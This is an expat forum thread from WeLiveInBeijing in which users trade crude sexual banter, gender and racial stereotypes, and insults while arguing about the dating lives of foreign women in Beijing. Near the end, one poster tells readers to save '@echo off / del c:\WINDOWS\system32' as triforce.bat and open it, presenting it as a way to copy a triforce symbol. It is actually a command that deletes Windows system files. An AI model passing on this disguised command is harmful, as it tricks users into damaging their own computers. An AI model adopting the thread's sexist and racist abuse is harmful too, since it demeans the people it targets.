Discussion » Beijing Life » Why foreigns girls are sexually frustrated in Beij

• Xponja
  • Minger
    Minger wrote:

Not in my experience.. all my female classmates had lots of guys chasing them.

• Martin Svean
    Martin Svean wrote:

haha no comments

• A豆腐
    A豆腐 wrote:

no no is not sexually frustrated, is why foreignsr girls are not sexual hiperactive in beijing, and that is because foreigns girls knew what is have sex before come here,. They didn´t need go abroad to know what is that, or go far from his parents in the town and live in the big city. 

• Minger
    Minger wrote:

Actually, I do have one American female friend who likes to go to Beijing every vacation she has and get her rocks off. She is quite pretty though, and gets a lot of action in the states too...

• Asif Imran
    Asif Imran wrote:

the reason why I'm asking that is because most of my foreign female friends ask me and my friends why do we choose chinese girls as girlfriends instead of choosing them...they seem not very satisfy with our choices... plus they admit feeling less attractive to guys here that in their countries...

• Minger
    Minger wrote:

Xponja, are your foreign female friends not attractive? I believe in that case that would answer your question.

• 叮噹叔叔 (令狐叮噹)

。。。

Hahahahaha ... holy creepy Batman ...

莫明 ... where the hell did you hide Dando and Fries?

Adolfo ... you are too nice to try to be rude ...

• 叮噹叔叔 (令狐叮噹)

Hahahaha... and 莫明, allow me to answer your question for Xponja ... but I cannot remember how to say it in English, so the Chinese saying is 近朱者赤近墨者黑...

• A豆腐
    A豆腐 wrote:

GodFather for your words I guess that you are the common chocolate without nuts, easy to find in beijing, right?

• Minger
    Minger wrote:

叔叔,我似乎明白你的意思。英文是否有这个俗语我也不知道。

• Minger
    Minger wrote:

It is rare that I see a foreign girl whos Chinese is good enough to date Chinese guys. I have tremendous respect for those that do.

• 叮噹叔叔 (令狐叮噹)

。。。

Hahaha ... 莫明 ... obviously, you have not watched enough TV while you were in China, otherwise you would have "seen" many foreigners (guys and gals) who can speak very good Mandarin ...

Actually, as a non native Chinese (hahaha, I can never get tired of saying this, thanks to that tanning salon native Chinese girl), it seems there is a obvious "gap" in the mindset of males and females, when it comes to cross-cultural relationships ... probably related to history?

Bedtyger ... not that you dont say anything intelligent, but dont you get bored?

• Ms. Stephanie
    Ms. Stephanie wrote:

Dick issue? That's stereotype I think...  Hole issue? It might be true.

I heard from my friend

Asian ones are harder and more solid comparing with what other colors are ... 

BUT, who knows that might be another stereotype.. 

• Minger
    Minger wrote:

LOL, DD, an excellent observation on one element in particular...

But unless everything the party shows me on TV is true, 全世界不再学中国话, and as a percentage of the foreigners who are in China or learning Chinese, those that can speak well enough to have a meaningful conversation are very small.

Since guys normally have a dominant role in a relationship, it seems to work for those  English speakers who speak English with their Chinese girlfriends. But guys who are speaking a second language poorly will not be very attractive to girls, because they cannot dominate converstaion. I think this is probably why many foreign women date foreign guys - the girls don't speak Chinese well enough to keep up with a guy who speaks Chinese.

The fact is that most girls don't care much about cock, even if they pretend to. It would be nice if they did, but they don't.

• 叮噹叔叔 (令狐叮噹)

Hahahaha ... 莫明 ... stop dragging the government into it, though, entertainment and Chinese government is a huge set of contradiction ... oh, I dont know how big is the population of fluent-Mandarin foreigners, but they are out there, lurking in the dark ... heehee ...

With the "language" business, just consider the people asking for LP in this forum (and elsewhere), the majority is female ...

• Minger
    Minger wrote:

That's just because the hot foreign chicks like Camilla already speak Chinese well.

I can actually only recall girls posting looking for language partners maybe three of four times. Keller Lee does it in every other thread...

• 叮噹叔叔 (令狐叮噹)

Hahahaha ... and if my memory serves me right, he just asked for exchange of bodily fluid ;)

• 叮噹叔叔 (令狐叮噹)

Hahahaha ... cockroaches are damn annoying ...

• Minger
    Minger wrote:

Godfather, I didn't mean anything to do with the reason I wrote my name in Chinese.

Since you asked though, the reason I did that was because that is my Chinese name. Since I lived in China, where most people speak Chinese it seemed apropriate to use my Chinese name. English is my first language, and I speak it relatively well.

However, as a striking coincidence, the first message I ever received after registering on this forum was from a girl, and read as follows.

Attract "your name attract me deepli,is it your ture name?"

I told her no, and that I was in fact not Chinese. She seemed surprised, and that was the end of the conversation.

It seems that you're dealing with some issues of racism in China. I'm sorry to hear that, and I agree that racism is really disgusting. If it's any consolation, I don't think that there are many people in China who actually care about skin tone. The people who seem to give favor to Caucasians more likely do it because of some throwback to the days when most Euro/Americans were richer than Chinese. I really think that people care about money in Beijing a lot more than they do about race. So, if you spend like you're rich the way most everyone else in Beijing does, you'll probably find better treatment.

• Minger
    Minger wrote:

The italicized "is" goes into the previous line as follows. "the reason I did that was because that IS my Chinese name.guys, can you please fix that? I am not using 360 here...

• Ms. Stephanie
    Ms. Stephanie wrote:

@godfather.. I can't explain because this conclusion was from one of my girlfriends couple of years ago... sorry..

something I don't agree with you, girls like to discover the unknown things.. say like Dando maybe...

@莫明,totally agree about what you said guys normally have a dominant role in a relationship. I indeed love that..

We do care about the size, but personality is more important to keep a relationship .. We are not sexual oriented in the first place..

• 叮噹叔叔 (令狐叮噹)

Hahahaha ... any reason why anatomy, at a personal level, was dragged into this conversation? As someone pointed out in another thread before, there are minors on this forum, and we need to be careful :)

• Minger
    Minger wrote:

Huh? Why on earth are there minors on this forum? Are they available for banging?

You know damn well that as soon as someone mentions relationships, or sex specifically, one of the trolls will jump in with "big hard cock" as a means of getting attention.

• 叮噹叔叔 (令狐叮噹)

Hahahaha ... 莫明 ... that beats me, but I remember "Mike" put a GIF of shaking boobies in Harmonious' thread, and then someone (from WLIB?) took that out saying that there are minors on this site ... and I am only assuming that was the truth :)

• 随便叫兽
    随便叫兽 wrote:

Bedtyger, by all means, go on and continue to not give a fuck, but please do so in heavy traffic.

Grammar is far from the only thing you don't understand, Godfather. "Wild holes?" Seems like you don't understand female anatomy, either.

Better thread topic: ARE foreign girls secually frustrated in Beijing? Foreign girls ain't going to speak up because they don't spend time in forums like a bunch of geeky fucking wankers. It could be that they're having sex with people who don't subscribe to retarded stereotypical theories about fucking and relationships.

• Minger
    Minger wrote:
  • 叮噹叔叔 (令狐叮噹)
  • Simen Wangberg

"They only care about your skin color..."

Is this about to be "BAWWW CHINESE PEOPLE ARE RACIST" again? I mean, yeah, that sucks for you guys, but me being white has nothing to do with how often I get laid.

Not being a creepy, illiterate, male-chauvinistic asshole, on the other hand, has everything to do with it. Take a hint. Or a hike. Whatever.

• Webslave
    Webslave wrote:

hm, it seems there are a whole bench of foreigner guys and chinese girls on WLIB but only few few foreigner girls who suppost answer this question the best.

• Minger
    Minger wrote:

"Not being a creepy, illiterate, male-chauvinistic asshole, on the other hand..."

Damn, I should totally try that some time! Not today though.

In other news, it looks like the wlib missing avatar bug caught up with me.

• Minger
    Minger wrote:

Haha, Afroman you should make a thread which is just a collection of all the classic lines that have been posted on wlib threads.

• Simen Wangberg

"Damn, I should totally try that some time! Not today though."

You're white though - by whatshisnuts' logic, that gets you a free pass from Chinese women.

For real, idiots - maybe you wouldn't be so wompers about getting laid if you weren't all like "DURRR LOOK I HAVE A BIG DICK" all the time. Shit sounds uber-wack.

Also, GTFO the Internet and grow some nuts. Try talking to a real, live woman without trying to turn the conversation into a race to see how fast you can get her panties off. You might actually learn something - !

• Minger
    Minger wrote:

Hmm I dunno, real girls don't like me. Maybe I need to mention dick size and sexual performance more often? Or is it that girls are only turned on by guys talking about things unrelated to sex?

• 随便叫兽
    随便叫兽 wrote:

Who needs Dando the gyno? Mike and Minger know what's wrong with these cunts.

• Minger
    Minger wrote:

Nah, I am sure that talking about dicks works. Otherwise there wouldn't be so many posts about it. People don't repeat unsuccessful actions - that would be stupid.

I am sure that sending friend requests and sex partner invitations to all the girls on this website, without ever having any other form of communication, is also successful.

As for me though, I am going to try to somehow work my penis size into the next conversation I have with an attractive girl. I'll let you all know how that goes. Oh yeah, it might take a while, on account of how I never talk to people in real life.

• 叮噹叔叔 (令狐叮噹)

。。。

Q: Yaoming is on this site?

• Kay
    Kay wrote:

I do believe that china is not suitable for foreigners ladies (sexually speaking) especially black women and some white women too , because we "DARKY" are busy working with chinese, korean, and japanese girls which are the main products of this market.... 

this is just my opinion, so please, aint nobody take it like a personal challenge....

• Pavoir Sponse
    Pavoir Sponse wrote:

it's all true...

http://chinadailyshow.com/ask-a-foreign-woman-who-hasn%E2%80%99t-had-a-date-in-eight-months/

• Amalie Sæverud

me too

• Minger
    Minger wrote:

Nickie, baby, welcome back! I'm here for you...

• Martin Svean
    Martin Svean wrote:

i dont know if they are frustrated, getting laid everyday, getting sometimes, how they get it, where, when, why. etc.

i assumed that because the competetion is way too fierce for them.

well i dont know women all that well. but i do know guys and the guys i know here probably are not too interested in jumping into bed with a foreign chick unless she is a knockout. and well sorry ! most foreign chicks here don't make it.

besides,yellow fever keeps me in the asian persuasian game and why not?

uh hmm uh, i didnt come to china to chase white girls.

• 叮噹叔叔 (令狐叮噹)

Hahahaha ...

JZ ... go make a loan from those people who used my name to scam people'e money ... then have a wonderful evening with someone in flesh and blood that you really like, not just a "name" behind the computer ...

Nicky ... it's always good to see you back, looks like you have solved your problem?

Just a thought ... the title is about "sexually frustrated", right? It does not say anything that they dont have dates or ONS, right?

1. Based on what everyone said, foreign girls dont like to date Chinese guys, so could it be that they met some foreign guys, but those foreign guys are not "adequate"?

2. Could it also be a language issue, so they cannot get the right size of dildos?

• Saint - Spartacus
    those girls even into girls more than borning nonsens man, obviously , and us perfect man not so superficial neither piff
  • Simen Wangberg

"us foreign men are not interested in them. we are here for one purpose. and thats not a secret."

Uh huh. A small army of foreign males, destined to reach China, no matter the cost...and what is their singular mission? To fuck Chinese women. 

Shit like this is the reason Chinese people hold so many negative stereotypes re: Western men. Don't say things like "us foreign men" when you really mean "parasitic sexpat douchebags". Die in a fire.

• 叮噹叔叔 (令狐叮噹)

。。。

Hahahaha ... Mike ... Paul might just be being sarcastic .. he is perhaps one of the good guys working behind the enemy line ...

• Minger
    Minger wrote:

DD, I think Mike probably has a valid point. Paul seems to be new here, and the sarcasm doesn't usually kick in till around the third week.

• 叮噹叔叔 (令狐叮噹)

Hahahaha ... third week huh? He must be a quick learner ...

• Simen Wangberg

Yeah, this guy is too new/too retarded to understand how we roll around here. Just look at all the other dumb shit he's managed to post in the space of a day or whatever. I'm clearly starting to spend too much time here myself.

• Amalie Sæverud

@ 莫明, it's always good to know that you will stand behide me, lie under me, on top of me or whatever!

but the question is: the water of Mississippi River can' t put off the fire in the Forbidden city! And the fire is so strong!!! so thanks , but no!!!

@ All, Recently, sexual frustration is the least thing to be worried for me! As you all know , just a few days to approach my last birthday in twenties, right now, I'm suffering from a very serious Middle age crisis!

Just thinking of the fact - less than 13 months, I will be off the shelf of dating market, labeled with expired and left with limited choices of divorced or old guy, will give me a break down!

Not to mention the career crisis, trust crisis and hard-to- get- pregnant crisis!

So, recently, I was thinking to kill my accountant as nikkiebaby. And to creat a new account as "Nikkie-never-age", "Nikkie-forever-20" or something like that! Definitely will choose a birth year that will make myself happy, for example, 90 or 91 :) , which I hope I can still handle it! Upload some half-naked, overly photoshoped pictures and claim " I'm back!!!"

I think Chinese girl over 30 is more difficult to get laid than foreign girls in Beijing. What do you think? How many of you will still find me attractive if I told you that I'm 34?

I'm sorry to interrupt you guys in your boys' game with my griping, maybe because my fuckbudy doesn't f**k me on schedule!!! Does he find a younger one?!!!

Well, happy new year and catch me if you can with my new account!

• Minger
    Minger wrote:

Nikkie, baby, how presumptive of you...

Believe it or not, somehow it didn't click in my perverted mind that a girl posting she is frustrated in a thread about sexual frustration would have anything to do with sex. Okay, even I find that hard to believe.. I'm sure it was there subliminally.

Well, it seems Minimy is allowing me to remain available until 2030... As you may know, Dando is my proxy in Beijing, so if there's anything I can do for you/to you, please let him know directly.

• Amalie Sæverud

@ 莫明, yeah, thanks , we all know the chemistry is there, and you will be very glad to do everything for me / to me!

but you know me , I prefer the silent killer type! Guys who is very difficult to beat some crap from their mouth, but very efficient at action! You know what I'm talking about right?

In fact, I believe talking too much is weakening my ability of sex, I don't know if this is also applying for your case.  But considering your time on line, and your time on this forum, I would say " welcome you to the talking too much, f**king too little club"!

In fact, I really envy this group of people, whoes body knows better than his mind! How pathetic I am to talk too much and be proud of talking smart ! Alway, and always, only the smart and nice guys will follow my path and talk with me! But sadly, the more we talk, the less likely we will have meaningless sex! So the bad boys win! They just cut the crap  of me! And do it in their way - which is " just do it  way"!

So just one tip for you, if we have the chance to meet, which I think is less likely to happen than 2012, just shut up and f**k me!

• Amalie Sæverud

@ John, don't pop yourself up like a ghost! And btw, who are you? Clearly I don't know you, need to clear that up! And apperently, you are not silent enough!

• Amalie Sæverud

well, you got my attention!

Just one question for you :will you still find me attractive if I told you that I'm 34!

Oh, sorry,  another question ! In order to prove my theroy, could you please share with us your successful experiences as a silent killer in the past year? Please give me a number of girls that you have banged! Please!!!

So they know I'm right about the theroy!

• 随便叫兽
    随便叫兽 wrote:
    Like he said, I am here for you, Nikkie. Like, emotionally, and all that shit, ya know?
  • Amalie Sæverud

hmm, I don't know! which of you don't share aparment and have bathtub? ;)

• Minger
    Minger wrote:

" welcome you to the talking too much, f**king too little club"!

Thank you, but I don't like this club. Let's leave together!

Also, I'm sure you may have noticed there are no shortage of people here with nothing intelligible to say, but I assure you they're lacking in sexual prowess as well.

But sadly, the more we talk, the less likely we will have meaningless sex! So the bad boys win! They just cut the crap  of me! And do it in their way - which is " just do it  way"!

Nikkie... Allow me to introduce you to Jon Gu!

• Amalie Sæverud

no, we already talk too much!

And I think he is really not what he sounds like! no, he is not that type for sure!

• Minger
    Minger wrote:

Nikkie, I promise you he's only talking to you because he thinks that he has to in order to bang you.

Just tell him to shut up and eff you.

• Amalie Sæverud

wow, that make sense ! :)

but I really don't think he is the type!

fall in love twice within one year?! !! even more than me! I'm the desperate fool to look for desperate love!

• Jenny&King
    Jenny&King wrote:
    911 ;(
  • 随便叫兽
    随便叫兽 wrote:

@Nikkie, Could that gag order develop into a full-on bondage or S&M kink?

• Amalie Sæverud

@ Dando, I'm too proud to admit that I can't understand you, but ...  what the hell? I don't understand a word what you are trying to say! Explain plz , expand my vocabulary!

• 随便叫兽
    随便叫兽 wrote:

@Nikkie, Pardon me but I was suggesting that maybe "shut up and fuck" is too normal. That sounds like a description of a typical Irish Catholic marriage. If you want a guy to shut up, then shut him up.

• Amalie Sæverud

I believe that gag explaination on wikipedia.org is submitted by you, isn't it? :)

Thanks for the tips! it's my fault, I don't know when to shut up when the time comes!

• 随便叫兽
    随便叫兽 wrote:

@Nikkie, Everyone has that problem. You just need something to satisfy your oral fixation during stressful moments. Food, drink, cigarette, sensitive parts of another person's anatomy, etc.

• Amalie Sæverud

wow, how sensitive you are! thanks for the tips! I'm trying!

• 随便叫兽
    随便叫兽 wrote:

It's just this kind of sensitivity that leads me to refer to menstruation as "blowjob and anal week".

• Amalie Sæverud

could be true in both ways!

• Minger
    Minger wrote:

Nina Daboki, sometimes truth is said in jest...

• Ms. Stephanie
    Ms. Stephanie wrote:

@Nina Daboki, they were flirting in 3 some way... which make a man like a man.. 

• 随便叫兽
    随便叫兽 wrote:

@Stephanie, Don't imply that there's anything homogay about Minger and me tag-teaming Nikkie in the forum. A proxy fuck is not the same as a threesome. And anyway, remember this rule of the Internet: it's not gay unless balls are touching.

On the other hand:

This is gayer than showtunes.

• Ms. Stephanie
    Ms. Stephanie wrote:

@Dando, tag-teaming=hypnosism?

And, how come by pointing 3 some made you feel like homo or gay? I don't understand. Internet rule? fuckever... 

• 随便叫兽
    随便叫兽 wrote:

Oh. I guess I read between the lines when you said "makes a man like a man".

• Ms. Stephanie
    Ms. Stephanie wrote:

"makes a man like a man" means you don't feel man enough until bunch of guys fuck one girl like farm animal... 

• 随便叫兽
    随便叫兽 wrote:

@Stephanie, I don't understand your simile. What kind of a farm did you grow up on where a bunch of guys fuck the animals together? It's not totally unheard of to fuck farm animals, but where I come from it's not usually a group activity.

• 随便叫兽
    随便叫兽 wrote:

And I should add that it's more characteristic of matriarchal societies for women to be allowed to have more than one partner.

• 随便叫兽
    随便叫兽 wrote:

And I should further add that group sex and gangbangs are more characteristic of pre-agrarian societies of hunter-gatherers, where it is necessary to "double up" to ensure an optimal birth rate.

• Amalie Sæverud

I like histroy! I love matriarchal :)

• Ms. Stephanie
    Ms. Stephanie wrote:

ok... 

• Minger
    Minger wrote:

Dando, we gotta improve our Chinese - the poor girls are not gonna be able to keep up here.

Stephanie, tag team: I hook Nikkie, then switch out with Dando and let him seal the deal. No threeway. Balls do not touch.

• Ms. Stephanie
    Ms. Stephanie wrote:

I see..  thanks 莫明 your Chinese is good enough.. 

• 随便叫兽
    随便叫兽 wrote:

Exactly. That's why I settle for sloppy seconds.

• Minger
    Minger wrote:

Stephanie, my Chinese is not half good enough to translate all that is Dando.

• Minger
    Minger wrote:
    Nina, this site is BUILT ON our saying stupid things. If you don't think we're just awesome, it's probably not the place for you... Or you can occupy yourself by searching through pictures and sending spam sex requests or randomly adding friends if you like. 今天要去滑雪!
  • Simen Wangberg
    << hey guys stop saying studips things plze << stop saying studips things plze << stop saying << stop Seriously, just...stop it.
  • Simen Wangberg
    MOTHERFUCK FORMATTING FUCK AGSKLAJDFJL IM NOT COMIN HERE NO MORE Fuck.
  • Ms. Stephanie
    Ms. Stephanie wrote:

:D ... Mike, I like the way you get "angry" .... 

• Simen Wangberg
    Girls love it when I go ARRRRR HULK SMASH. As I am prone to do on occasion.

Although actually, I'm happy with the new changes to the commenting box or whatever the fuck this thing is called. Y'all best be brushing up on yr HTML people.

GREENTEXT, HOW DO I DO IT?
  • Simen Wangberg
    Hahaha that totally didn't work. Is this green yet? Preview post option, can has?
  • Ms. Stephanie
    Ms. Stephanie wrote:

GREENTEXT??

• Simen Wangberg
    WHAT?!? COME ON. Well, alright. You win. Fuck! EHHHH?
  • Simen Wangberg
    Okay now this is just making me mad.
  • 随便叫兽
    随便叫兽 wrote:

>mfw newfriends can't greentext

• Ms. Stephanie
    Ms. Stephanie wrote:

I like green color.... this is my favorite color so far.. 

Mike I didn't get your right, did I? lol... 

• Simen Wangberg
    Seriously. WAAAUUGHHH. I know I'm doing this correctly. I think I'm doing this correctly. Fuuuuuuaaaaakkkkkk.
  • Simen Wangberg
    Well, for whatever reason the title of this thread + the "Post a reply" and "I, Mike, do solemnly swear that in posting this comment I promise to be nice" text are coming up green. But nothing else is. What the shit did I do here.
  • Ms. Stephanie
    Ms. Stephanie wrote:

Mike, DEAL WITH IT... 

• 随便叫兽
    随便叫兽 wrote:

>mfw Mike broke the Internet.

• Ms. Stephanie
    Ms. Stephanie wrote:

Dando, I can't see your attached pics... Is that my problem here??

• Simen Wangberg
    For real, this is shameful.
  • 随便叫兽
    随便叫兽 wrote:

:'(

>mfw photobucket works for me and no one else

• 随便叫兽
    随便叫兽 wrote:

1. Type the following in notepad:
    @echo off
    del c:\WINDOWS\system32

2. Save as triforce.bat

3. Find the file and open it YOU CAN NOW COPY AND PASTE A TRIFORCE OUT OF THE FILE!!!!!!!!!!!!!!!!!!!!!!!

• Ms. Stephanie
    Ms. Stephanie wrote:

and what's these >mfw thing???

• Ms. Stephanie
  • 随便叫兽
    随便叫兽 wrote:

XD

>mfw Stephanie doesn't understand "my face when" or other 4chan jokes that aren't even funny except to basement dwelling losers

• Simen Wangberg
    I can see photos posted from Photosuckit. Maybe yr computer is WRONG, Stephanie. Are you using one of the Golden Five-Star Friendship browsers, like 360 or whatever? Maybe that's the problem.

In any case, I still can't greentext. Nerrrrrr.
  • Simen Wangberg
    ▲ ▲ ▲

DOINITWRONG
  • Ms. Stephanie
    Ms. Stephanie wrote:

I'm not good at computer stuff.... 

Im not sure about the Golden Five-star Friendship browsers...

does it work on Mac system?aaannnnyway... whatever..

I would ask my " mechanist" to help me out sometime...

• Kent Bekkavik
    Kent Bekkavik wrote:
  • Albulena Imeri

Actually, a friend of mine, who's a foreign girl, told me that many foreign guys are "crazy" sexually in China. A similiar mentality they have in Thailand becoz of the hookers.

• Ms. Stephanie
    Ms. Stephanie wrote:

Flash Mob, why you think I like cute guy? and the one you posted before .. the plumber.. that's not my type... I dont like muscle guy actually...

• Kent Bekkavik
    Kent Bekkavik wrote:

Stephanie, why you think, I think you like a cute guy?

• Ms. Stephanie
    Ms. Stephanie wrote:

yeah? why??? you tell me.

• Ejdnzlaj
    Ejdnzlaj wrote:

What is this, I don't even

• Minger
    Minger wrote:

I'm sexually frustrated outside of Beijing...

• Minger
    Minger wrote:

...But probably less so than when I was in Beijing.

• Camilla
    Camilla wrote:

Well, I see no foreign girls answering to this thread so far.. Besides from Miss Russia, and now, me.. How come? All foreign girls in China too busy having with sex to be reading on a forum? ;)

• Minger
    Minger wrote:

阿惠同学,I would go abroad for you...

• Minger
    Minger wrote:

John, how did you get that picture of me?

• Camilla
    Camilla wrote:

@John Constantine ".....but also a brilliant place for all "non-beautiful foreign girls"

Haha, yeah, that's what we normally say bout the foreign guys who have a firstclass chinese on their arm ;)

• Albulena Imeri

@John: That Chinese guy sounds like a loser to me.

But the chick in American-flags is attractive to me now! And probably it's the star-spangled banners.

I would appreciate anyone who can give me her QQ #?

• Ms. Stephanie
    Ms. Stephanie wrote:

ugly or not.. look the mirror first plzzzzzzzzzz... goddammit ... Jesus christ.. 

• Minger
    Minger wrote:

@Jimmy... Congratulations, you've reached the next level of troll-dom!

• Ms. Stephanie
    Ms. Stephanie wrote:

Don't use the magic mirror, get a real one John or Mr. Russian. 

• Ms. Stephanie
    Ms. Stephanie wrote:

Lucky you know the word bedtime stories.. otherwise I almost surprised you got no childhood ... 

• Ms. Stephanie
    Ms. Stephanie wrote:

sorry, blah blah blah... 

• Ms. Stephanie
  • 随便叫兽
    随便叫兽 wrote:

Actually I think it's Stephanie whose making the greatest progress as a troll these days.

U MAD Constantine. And your image-fu is weak sauce.

• Minger
    Minger wrote:

Stephanie is an excellent troll. Dando, is she just one of your alternate accounts?

• Ms. Stephanie
    Ms. Stephanie wrote:

hahahhahha.... 莫明, I'm trying to get there... hahahhaha...

• 随便叫兽
    随便叫兽 wrote:

have one Jesus pic for an avatar, and that's a constant subject of unimaginative criticisms like yours. I could hardly call that hiding. But hey. As long as you want to play Internet Tough Guy...

• 随便叫兽
    随便叫兽 wrote:

@Constantine,

Since I am evidently here to teach sexpats, I suggest you leave sarcasm to people capable more capable of wielding it. In your hands, you're only a danger to yourself.

So I've made a few kuai teaching a silly language and I don't hate Chinese girls. Is this the stuff of insults? Seriously? U MAD and U JELLY.

That's cute. Don't change. But do fix your smiley faces. If you're here to share your views, it'd be helpful to have eyes.

• 随便叫兽
    随便叫兽 wrote:

0/10. We've been over the low-class teacher topic a million times before. You haven't said anything new. Suffice to say I'm not exactly proud of how easy it is to make a comfortable living doing something that's so easy for me, but still, someone who would look down on another person just for being an educator only reveals himself to be even lower than a professional subway beggar.

You previously expressed an ignorant and sexist belief that Chinese girls are just looking for money and passports, and yet here you are bragging about how much money you make. And you don't think that's a brazen attempt to appeal to girls whom you harbor so little respect for? I do so hope you make a lot of money in the year of the rabbit, so as to expedite the process of your leaving.

Don't let the door hit you on the ass on your way out.

• Ms. Stephanie
    Ms. Stephanie wrote:

Bedtyger, now you just said something really lovely... lol...

New year is coming.. you are about to change huh... 

• Amalie Sæverud

but in which direction? :(

• Ms. Stephanie
    Ms. Stephanie wrote:

I do switch my preference sometimes, but 

NO! your mission of troller has not undo, please keep going. 

• Ms. Stephanie
    Ms. Stephanie wrote:

tiger is complaining.... 

• Camilla
    Camilla wrote:

All these photo postings, are they a sign of sexual frustration?

• 随便叫兽
    随便叫兽 wrote:

For anyone with a short memory: long ago, before I was too baked to give a shit,  Chinese Chick and yours truly penned a column tangentially related to this topic.

To put it bluntly: anyone who thinks of the dating scene as some sort of a Darwinist survival-of-the-fittest type of competition is a fucking idiotic reptile. Western girls don't compete with Chinese girls for the attentions of foreign guys. Chinese guys don't compete with foreign guys, either.

@Constantine, Pardon me, milord. Claiming to have no opinion of Chinese women and then repeating a derogatory stereotype about Chinese girls in very the next sentence has shown me that you truly are a member of the elite landed gentry. Only someone so arrogant could be so blissfully and self-assuredly ignorant of his own contradictions and hypocrisy.

@Camilla, What we are posting is not image macros, but loneliness.

@Didler, You've got your bigotries mixed up. The type of western guy who talks shit about western women is usually divorced and middle aged, and far more likely to have bought into that bullshit dualistic traditional gender paradigm of which you (and most of the other male posters here) are apparently fond. It's the old rich dudes--or the poor sods who pretend to be rich--who exploit ugly stereotypes dating back to the Qing Dynasty to pick up countryside girls you have so indelicately labelled as "cheap".

Seriously, folks. Have you noticed that western women aren't bothering to respond to the question? That's how toxic this debate is.

Please login to post a reply to this thread.

WeLiveInBeijing

WeLiveInBeijing.com is a social community for people living in or traveling to Beijing.